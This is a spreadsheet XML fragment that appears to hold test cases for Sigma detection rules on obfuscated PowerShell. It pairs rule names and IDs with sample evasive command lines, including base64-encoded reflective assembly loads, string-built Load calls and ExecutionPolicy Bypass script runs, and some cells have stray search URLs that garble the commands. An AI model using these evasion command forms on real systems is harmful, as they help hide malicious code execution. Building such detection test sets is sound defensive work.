      <c r="J260" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K260" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="261" ht="15.75" customHeight="1" s="42">
      <c r="A261" s="43" t="n"/>
      <c r="B261" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C261" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D261" s="36" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E261" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -encOdEDCommAND WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F261" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G261" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H261" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I261" s="43" t="n"/>
      <c r="J261" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K261" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="262" ht="15.75" customHeight="1" s="42">
      <c r="A262" s="43" t="n"/>
      <c r="B262" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C262" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D262" s="36" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E262" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ENcODEDCOmmAnD WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F262" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G262" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H262" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I262" s="43" t="n"/>
      <c r="J262" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K262" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="263" ht="15.75" customHeight="1" s="42">
      <c r="A263" s="43" t="n"/>
      <c r="B263" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C263" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D263" s="36" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E263" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EnCoDEDCoMMAND WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F263" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G263" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H263" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I263" s="43" t="n"/>
      <c r="J263" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K263" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="264" ht="15.75" customHeight="1" s="42">
      <c r="A264" s="43" t="n"/>
      <c r="B264" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C264" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D264" s="36" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E264" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -encodedcoMmaNd WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F264" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G264" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H264" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I264" s="43" t="n"/>
      <c r="J264" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K264" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="265" ht="15.75" customHeight="1" s="42">
      <c r="A265" s="43" t="n"/>
      <c r="B265" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C265" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D265" s="36" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E265" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$m = 'Load'; [Reflection.Assembly]::$m.Invoke($data)"</t>
        </is>
      </c>
      <c r="F265" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G265" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H265" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I265" s="43" t="n"/>
      <c r="J265" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K265" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="266" ht="15.75" customHeight="1" s="42">
      <c r="A266" s="43" t="n"/>
      <c r="B266" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C266" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D266" s="36" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E266" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[Reflection.Assembly]::('L'+'o'+'ad').Invoke($data)"</t>
        </is>
      </c>
      <c r="F266" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G266" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H266" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I266" s="43" t="n"/>
      <c r="J266" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K266" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="267" ht="15.75" customHeight="1" s="42">
      <c r="A267" s="43" t="n"/>
      <c r="B267" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C267" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D267" s="36" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E267" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[Reflection.Assembly]::('L'+'o'+'ad').Invoke($data)"</t>
        </is>
      </c>
      <c r="F267" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G267" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H267" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I267" s="43" t="n"/>
      <c r="J267" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K267" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="268" ht="15.75" customHeight="1" s="42">
      <c r="A268" s="43" t="n"/>
      <c r="B268" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C268" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D268" s="36" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E268" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Reflection.Assembly]::(\"{1}{0}\" -f 'oad','L').Invoke($data)"</t>
        </is>
      </c>
      <c r="F268" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G268" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H268" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I268" s="43" t="n"/>
      <c r="J268" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K268" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="269" ht="15.75" customHeight="1" s="42">
      <c r="A269" s="43" t="n"/>
      <c r="B269" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C269" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D269" s="36" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E269" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "[Reflection.Assembly]::(\" {1}{0}\" -F 'oad' ,'L').Invoke($data)"</t>
        </is>
      </c>
      <c r="F269" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G269" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H269" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I269" s="43" t="n"/>
      <c r="J269" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K269" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="270" ht="15.75" customHeight="1" s="42">
      <c r="A270" s="43" t="n"/>
      <c r="B270" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C270" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D270" s="36" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E270" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMMaNd "[Reflection.Assembly]::(\" {1}{0}\" -f 'oad' ,'L').Invoke($data)"</t>
        </is>
      </c>
      <c r="F270" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G270" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H270" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I270" s="36" t="n"/>
      <c r="J270" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K270" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="271" ht="15.75" customHeight="1" s="42">
      <c r="A271" s="43" t="n"/>
      <c r="B271" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C271" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D271" s="36" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E271" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[Reflection.Assembly]::(\" {1}{0}\" -F 'oad' ,'L').Invoke($data)"</t>
        </is>
      </c>
      <c r="F271" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G271" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H271" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I271" s="43" t="n"/>
      <c r="J271" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K271" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="272" ht="15.75" customHeight="1" s="42">
      <c r="A272" s="43" t="n"/>
      <c r="B272" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C272" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D272" s="36" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E272" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "[Reflection.Assembly]::(\" {1}{0}\" -f 'oad' ,'L').Invoke($data)"</t>
        </is>
      </c>
      <c r="F272" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G272" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H272" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I272" s="36" t="n"/>
      <c r="J272" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K272" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="273" ht="15.75" customHeight="1" s="42">
      <c r="A273" s="43" t="n"/>
      <c r="B273" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C273" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D273" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E273" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$w='Win32\_'; $p='Process'; Get-CimInstance -ClassName ($w+$p)"</t>
        </is>
      </c>
      <c r="F273" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G273" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H273" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I273" s="36" t="n"/>
      <c r="J273" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K273" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="274" ht="15.75" customHeight="1" s="42">
      <c r="A274" s="43" t="n"/>
      <c r="B274" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C274" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D274" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E274" s="36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274" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G274" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H274" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I274" s="43" t="n"/>
      <c r="J274" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K274" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="275" ht="15.75" customHeight="1" s="42">
      <c r="A275" s="43" t="n"/>
      <c r="B275" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C275" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D275" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E275" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Get-WmiObject -Class ([char[]](https://www.google.com/search?q=87,105,110,51,50,95,80,114,111,99,101,115,115) -join '')"</t>
        </is>
      </c>
      <c r="F275" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G275" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H275" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I275" s="36" t="n"/>
      <c r="J275" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K275" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="276" ht="15.75" customHeight="1" s="42">
      <c r="A276" s="43" t="n"/>
      <c r="B276" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C276" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D276" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E276" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-WmiObject -Class ([char[]](https://www.google.com/search?q=87,105,110,51,50,95,80,114,111,99,101,115,115) -join '')"</t>
        </is>
      </c>
      <c r="F276" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G276" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H276" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I276" s="43" t="n"/>
      <c r="J276" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K276" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="277" ht="15.75" customHeight="1" s="42">
      <c r="A277" s="43" t="n"/>
      <c r="B277" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C277" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D277" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E277" s="36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277" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G277" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H277" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I277" s="36" t="n"/>
      <c r="J277" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K277" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="278" ht="15.75" customHeight="1" s="42">
      <c r="A278" s="43" t="n"/>
      <c r="B278" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C278" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D278" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E278" s="36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278" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G278" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H278" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I278" s="43" t="n"/>
      <c r="J278" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K278" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="279" ht="15.75" customHeight="1" s="42">
      <c r="A279" s="43" t="n"/>
      <c r="B279" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C279" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D279" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E279" s="36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279" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G279" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H279" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I279" s="43" t="n"/>
      <c r="J279" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K279" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="280" ht="15.75" customHeight="1" s="42">
      <c r="A280" s="43" t="n"/>
      <c r="B280" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C280" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D280" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E280" s="36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F280" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G280" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H280" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I280" s="43" t="n"/>
      <c r="J280" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K280" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="281" ht="15.75" customHeight="1" s="42">
      <c r="A281" s="43" t="n"/>
      <c r="B281" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C281" s="36" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D281" s="36" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E281" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand Q29udmVydFRvLVNlY3VyZVN0cmluZyAtU3RyaW5nICdQYXNzd29yZCcgLUFzUGxhaW5UZXh0IC1Gb3JjZQ==</t>
        </is>
      </c>
      <c r="F281" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G281" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H281" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I281" s="43" t="n"/>
      <c r="J281" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K281" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="282" ht="15.75" customHeight="1" s="42">
      <c r="A282" s="43" t="n"/>
      <c r="B282" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C282" s="36" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D282" s="36" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E282" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" Q29udmVydFRvLVNlY3VyZVN0cmluZyAtU3RyaW5nICdQYXNzd29yZCcgLUFzUGxhaW5UZXh0IC1Gb3JjZQ==</t>
        </is>
      </c>
      <c r="F282" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G282" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H282" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I282" s="36" t="n"/>
      <c r="J282" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K282" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="283" ht="15.75" customHeight="1" s="42">
      <c r="A283" s="43" t="n"/>
      <c r="B283" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C283" s="36" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D283" s="36" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E283" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -enc Q29udmVydFRvLVNlY3VyZVN0cmluZyAtU3RyaW5nICdQYXNzd29yZCcgLUFzUGxhaW5UZXh0IC1Gb3JjZQ==</t>
        </is>
      </c>
      <c r="F283" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G283" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H283" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I283" s="36" t="n"/>
      <c r="J283" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K283" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="284" ht="15.75" customHeight="1" s="42">
      <c r="A284" s="43" t="n"/>
      <c r="B284" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C284" s="36" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D284" s="36" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E284" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -enCOdEDCOMMaNd Q29udmVydFRvLVNlY3VyZVN0cmluZyAtU3RyaW5nICdQYXNzd29yZCcgLUFzUGxhaW5UZXh0IC1Gb3JjZQ==</t>
        </is>
      </c>
      <c r="F284" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G284" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H284" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I284" s="43" t="n"/>
      <c r="J284" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K284" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="285" ht="15.75" customHeight="1" s="42">
      <c r="A285" s="43" t="n"/>
      <c r="B285" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C285" s="36" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D285" s="36" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E285" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$a='ConvertTo-'; $b='SecureString'; $c=$a+$b; &amp;$c -String 'MySecret' -AsPlainText -Force"</t>
        </is>
      </c>
      <c r="F285" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G285" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H285" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I285" s="36" t="n"/>
      <c r="J285" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K285" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="286" ht="15.75" customHeight="1" s="42">
      <c r="A286" s="43" t="n"/>
      <c r="B286" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C286" s="36" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D286" s="36" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E286" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$a='ConvertTo-'; $b='SecureString'; $c=$a+$b; &amp;$c -String 'MySecret' -AsPlainText -Force"</t>
        </is>
      </c>
      <c r="F286" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G286" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H286" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I286" s="43" t="n"/>
      <c r="J286" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K286" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="287" ht="15.75" customHeight="1" s="42">
      <c r="A287" s="43" t="n"/>
      <c r="B287" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C287" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D287" s="36" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E287" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -f C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F287" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G287" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H287" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I287" s="43" t="n"/>
      <c r="J287" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K287" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="288" ht="15.75" customHeight="1" s="42">
      <c r="A288" s="43" t="n"/>
      <c r="B288" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C288" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D288" s="36" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E288" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -fiLE C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F288" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G288" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H288" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I288" s="43" t="n"/>
      <c r="J288" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K288" s="36" t="b">
        <v>0</v>
      </c>
    </row>
